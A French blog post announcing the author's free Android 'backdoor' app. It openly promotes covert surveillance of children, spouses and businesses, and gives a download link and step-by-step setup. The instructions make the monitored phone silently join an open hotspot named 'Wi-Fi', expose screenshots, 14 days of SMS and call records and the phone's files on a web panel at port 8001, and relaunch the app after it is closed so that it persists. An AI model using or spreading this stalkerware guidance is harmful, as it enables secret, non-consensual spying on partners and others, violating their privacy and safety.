{Backdoor} – Surveiller un smartphone Android sur un réseau « local »

Bonjour à tous,

 

En effet je publie beaucoup moins d'article, mais si je suis absent du blog par moments je n'ai pas encore lâché les manettes !  C'est juste que ces dernières années j'avais beaucoup de temps pour gérer le blog, écrire des articles, faire les recherches et produire des choses dans le cadre de mes articles ...
Aujourd'hui c'est un peu moins le cas :/
Mais je vous remercie pour vos messages d'encouragement et de soutien qui me touchent beaucoup ;)
Mais je suis toujours là, je suis désormais dans un environnement avec un tas de sujet hyper chouette qui demande pas mal de travail, et qui feront très certainement l'objet d'article lorsque mon agenda me le permettra !
En attendant je vous propose aujourd'hui une application développée en langage "natif" (JAVA) pour Android !
Ce petit "logiciel" permet de surveiller le smartphone sur lequel celui-ci est installé.

 

Un développement libre et sans virus

Cela fait un petit moment que j'avais envie de m'y mettre car il existe bon nombre de solution "d'espionnage" (surveiller vos enfants, votre conjoint(e),  espionnage industriel, ...) mais peu sont gratuites .. et encore moins proposent un code source court et gratuit.

C'est donc avec dans l'idée de vous permettre d'avoir cette possibilité / accessibilité que je me suis mis en tête de vous développer cela.

 

Un réseau "local"

Par le passé j'ai développé et proposé des applications sur le blog, et souvent celle-ci travaillait avec mon serveur :s
C'était contraignant pour vous, comme pour moi .. car le jour ou dyrk est indispo, l'application aussi. Sans compter les traitements lourds qui pouvaient être gérés par mon serveur (Ex : OCR).

L'avantage d'un réseau local, c'est que vous pouvez l'utiliser même sans accès à internet, le simple fait d'être sur le même réseau que la personne que vous souhaitez surveiller, suffit à fonctionner.

L'inconvénient, vous devrez être sur le même réseau que la personne qui dispose du smartphone / tablette sur lequel est installée l'application. Inutile donc d'essayer de vous y connecter si vous n'êtes pas à proximité de la personne.

 

Mais si je ne suis pas sur le même réseau ?

Vous êtes à côté de la personne mais elle n'est pas sur le même réseau que vous ?
Rassurez-vous, j'y ai pensé, et c'est simple comme "bonjour", l'application va scanner régulièrement les "réseau wifi" à proximité.
Si l'application détecte un réseau avec le nom "Wi-Fi" et que celui-ci est non sécurisé, alors elle va
automatiquement connecter le smartphone  à celui-ci

Ainsi, il vous suffira tout simplement d'installer l'application sur le smartphone que vous souhaitez espionner, puis de créer depuis votre smartphone un hotspot en le nommant "Wi-Fi" et en supprimant le mot de passe.

 

Procédure d'installation

La première étape est de télécharger l'application ici  :backdoor.tar.gz 
Ou de télécharger et reconstruire l'application à partir des sources (ensemble de fichier contenant le code source et autres éléments utilisés par l'application) :Remote WebService

Sur le smartphone à surveiller 

  1. Lorsque vous avez l'application, installez là sur le smartphone ou la tablette que vous souhaitez surveiller.
  2. Ouvrez l'application une première fois et approuvez toutes les autorisations qui vous seront demandées
  3. Activez la localisation ... (C'est tristement / malheureusement indispensable pour que l'application puisse scanner les "réseaux Wifi")
  4. Sortez de l'application (laissez là en arrière-plan)

Depuis votre smartphone

  1. Activez le partage de connexion par "Wifi"
  2. Configurez le partage de connexion avec le nom "Wi-Fi" et ne mettez pas de mot de passe dessus.
  3. Attendez quelques instant que le "smartphone à surveiller" détecter votre partage et s'y connecte (aucune action, tout se fait de manière automatique)
  4. Si l'IP du smartphone qui  s'est connecté à votre "partage de connexion" apparaît, Ouvrez un navigateur sur l'ip suivante : http://<ip du smartphone>:8001 
  5. Vous devriez voir une page apparaitre avec la possibilité de faire (capture d'écran de l'application, consultation des sms / appels sur 14 jours, explorations des fichiers)

 

Si l'application s'arrête ?

L'application est associée à un service qui détecte automatiquement lorsque l'application se ferme, et devinez quoi ? Il l'a relance !

 

Si la personne arrête le GPS ?

Lorsque l'application se relancera (cf. chapitre ci-dessus) elle ouvrira automatiquement une page pour que la personne réactive le GPS ?

 

Conclusion

Je sais que cet article est une goutte d'eau par rapport au flot d'articles que j'ai pu sortir par le passé.
J'espère cependant qu'elle vous plaira.
N'hésitez surtout pas à améliorer le code source et à le partager dans les commentaires (lien vers un fichier, Github, Gitlab, Svn, CVS...)
Cette application n'est pas parfaite n'y exempte de bug, mais elle ne demande qu'à vivre et pour cela
tout contributeur est le bienvenu !
Soyez indulgent sur la qualité du code, je ne suis pas un passionné de Java :s
En attendant je vous souhaite à tous une très bonne année étant donné qu'il s'agit de mon premier article pour 2020 !

 

 

 

Partagez ce contenu

Laisser une réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *